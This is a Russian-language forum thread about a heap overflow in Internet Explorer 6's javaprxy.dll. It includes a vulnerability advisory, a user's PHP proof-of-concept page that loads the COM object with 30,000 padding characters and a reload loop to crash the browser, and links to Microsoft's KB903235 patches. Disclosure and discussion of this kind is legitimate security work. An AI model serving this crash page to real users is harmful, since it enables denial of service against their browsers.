Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll
Программа: Microsoft Internet Explorer 6.0.2900.2180
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Переполнение кучи существует в библиотеке javaprxy.dll при обработке исключений в COM объектах. Удаленный пользователь может с помощью специально сформированной HTML страницы вызвать аварийное завершение работы браузера или выполнить произвольный код на целевой системе.

Пример/Эксполит: см. источник сообщения
URL производителя: microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источники:
http://www.securitylab.ru/55527.html ( http://www.securitylab.ru/55528.html )
http://security.nnov.ru/Enews942.html

Это прикол. Идё сюда http://www.securitylab.ru/55528.html и читаем:

microsoft does not confirm the vulnerability, as their product team can
not reproduce condition. however, they are looking at making changes to
handle COM objects in a more robust manner in the future.

Т.е. microsoft не подтвердила уязвимость, так как их программисты не могут воспроизвести условия.
При этом используя приведённый там же код я отлично воспроизвёл условие без всяких проблем.

Для тех кто не дружит с Перлом - код на PHP:

<?php

$clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

$html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
$html2 = "\n</body><script>location.reload();</script></html>\n";

print "Content-Type: text/html;\r\n\r\n";

print $html1.str_repeat("A",30000).$html2;

?>

Обновление системы безопасности для обозревателя Internet Explorer устраняющее уязвимость в Javaprxy.dll COM

Microsoft Knowledge Base Article 903235 (http://support.microsoft.com/?id=903235)

Security Update for Internet Explorer for Windows XP Service Pack 2 (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=1&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3dc138176 8-6c6d-4568-97b1-600db8798ebf%26DisplayLang%3den

Security Update for Internet Explorer 5.5 Service Pack 2 (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=2&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3d06f8cd1 b-93a0-4522-af7d-603dd5c2bacb%26DisplayLang%3den

Security Update for Internet Explorer 5.01 for Windows 2000 (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=3&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3d25982e0 2-ec6d-44ce-82de-12ddef1addd6%26DisplayLang%3den

Security Update for Internet Explorer 6 Service Pack 1 (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=4&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3d2a506c1 6-01ef-4060-bcf8-6993c55840a9%26DisplayLang%3den

Security Update for Internet Explorer for Windows Server 2003 (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=20&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3df368e23 1-9918-4881-9f17-60312f82183f%26DisplayLang%3den

Security Update for Internet Explorer for Windows Server 2003 x64-bit Edition (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=19&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3d6820922 5-a682-4008-a22b-881c401486f7%26DisplayLang%3den

Security Update for Internet Explorer for Windows Server 2003 Itanium 64-bit Edition (KB903235)
http://www.microsoft.com/downloads/info.aspx?na=22&p=18&SrcDisplayLang=en&SrcCategoryId=&SrcFamilyId=&u=%2fdownloads%2fdetails.aspx%3fFamilyID%3dd785f9a b-dbe9-4272-a87e-64205690f98e%26DisplayLang%3den